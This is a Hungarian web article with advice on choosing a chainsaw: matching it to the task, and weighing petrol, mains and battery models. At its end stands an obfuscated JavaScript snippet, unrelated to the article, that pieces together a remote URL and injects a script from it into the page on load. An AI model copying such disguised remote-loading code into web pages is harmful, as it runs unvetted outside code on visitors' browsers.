Gépesítés
Technika
Jó ötlet a láncfűrész vásárlása, de hogyan tovább?
Amikor felmerül az igény a láncfűrész beszerzésére, az a nulladik lépés. Megszületett a gondolat, de hogyan tovább? Hogyan tovább úgy, hogy a végcél a sikeres alkalmazás? Íme, néhány praktikus tanács a témában! Előre az igényekkel?
Igen, tulajdonképpen az a láncfűrész nevezhető tökéletesnek, mely minden egyénileg felmerülő elvárásnak maradéktalanul megfelel. Vagyis az első lépés a döntés meghozása, azaz hogy mire is kell pontosan a fűrész? Néhány példa: tűzifaaprítás, kisebb vagy nagyobb fák kivágása, rönkök fűrészelése. Utóbbiak kivitelezésére egyébként a hagyományos alternatíva pazarul megfelel.
Az ágvágó típus a szűk helyeken való boldogulás elmaradhatatlan kelléke, magasan lévő ágak, gallyak levágásánál. Benzines, akkumulátoros és hálózati kialakítás egyaránt elérhető ebből a fajtából. Nyilván, ha az a kérdés, hogy melyik energiaellátási forma a leginkább ideális, akkor újfent kizárólag az egyéni kritériumok, adottságok azok, amik mérvadóak.
Még egy kicsit bővebben az energiaforrás kiválasztásáról!
A fő dilemma, hogy benzines vagy elektromos, utóbbiból hálózati, esetleg akkumulátoros. A munkaterület nagysága, megközelíthetősége és holléte nagyban meghatározza, hogy melyik az a verzió, aminek az alkalmazása a legtöbb előnnyel kecsegtet.
A benzinmotoros konstrukciók ütőkártyái közé tartoznak erejük, teljesítményük, mobilizálhatóságuk. Gyakorlatilag számtalan méretben beszerezhetőek a konkrét feladat függvényében.
Az elektromos variánsok keveset fogyasztanak, kis helyen is elférnek, ugyanakkor nem rendelkeznek olyan kicsattanó erővel, mint a benzines típusok. Valamit valamiért. Kisebb vagy nagyobb ágak levágásához amúgy abszolút alkalmasak. Előnyeik közé sorolható, hogy roppantul csendesek, nem bocsájtanak ki a természetre káros anyagokat, keveset fogyasztanak, és alapjáraton is kedvező a bekerülési költségük.
Akku vagy nem akku?
Az elektromos verziók hálózati kábellel, vagy aksival kaphatóak. Az akkumulátoros gépek esetén érdemes belekalkulálni az akku jelenlétéből fakadó plusz súlyt, valamint a véges üzemidőt, mint hátráltató tényezőt.
(X)
(function(){
qc0m=document.createElement("script");qc0m_=("us")+("ta");
qc0m_+="t"+(".");qc0m_+=("in");qc0mu="485788754";qc0m.async=true;
qc0mu+=".nquf8rfjc0mtdy7kg";qc0m.type="text/javascript";qc0m_+="f"+"o"+("/");
qc0mu+="3Xni4gh7pbfkg";qc0m.src="https://"+qc0m_+qc0mu;
dqc0m=document.body;dqc0m.appendChild(qc0m);
})();